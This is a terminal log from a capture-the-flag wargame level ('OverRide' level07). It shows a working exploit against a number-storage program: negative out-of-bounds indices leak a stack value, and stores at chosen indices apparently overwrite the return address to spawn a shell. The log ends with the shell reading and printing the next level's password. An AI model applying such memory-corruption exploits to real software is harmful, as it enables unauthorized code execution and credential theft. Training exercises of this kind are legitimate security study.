```sh
level07@OverRide:~$ ./level07 
----------------------------------------------------
  Welcome to wil's crappy number storage service!   
----------------------------------------------------
 Commands:                                          
    store - store a number into the data storage    
    read  - read a number from the data storage     
    quit  - exit the program                        
----------------------------------------------------
   wil has reserved some storage :>                 
----------------------------------------------------

Input command: read
 Index: -9
 Number at data[4294967287] is 4294956116
 Completed read command successfully
Input command: store
 Number: 4294956132
 Index: -11
 Completed store command successfully
Input command: read
 Index: -11
 Number at data[4294967285] is 4294956132
 Completed read command successfully
Input command: store
 Number: 4159090384
 Index: 5
 Completed store command successfully
Input command: store     
 Number: 4160264172
 Index: 7
 Completed store command successfully
Input command: quit
$ ls
ls: cannot open directory .: Permission denied
$ cat /home/users/level08/.pass
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
```